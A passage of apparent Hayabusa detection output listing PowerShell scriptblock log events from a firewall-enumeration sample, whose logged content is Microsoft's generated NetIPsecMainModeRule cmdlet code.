($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; 
Va",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lue = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainMod",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"eRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 
System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( 
[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') 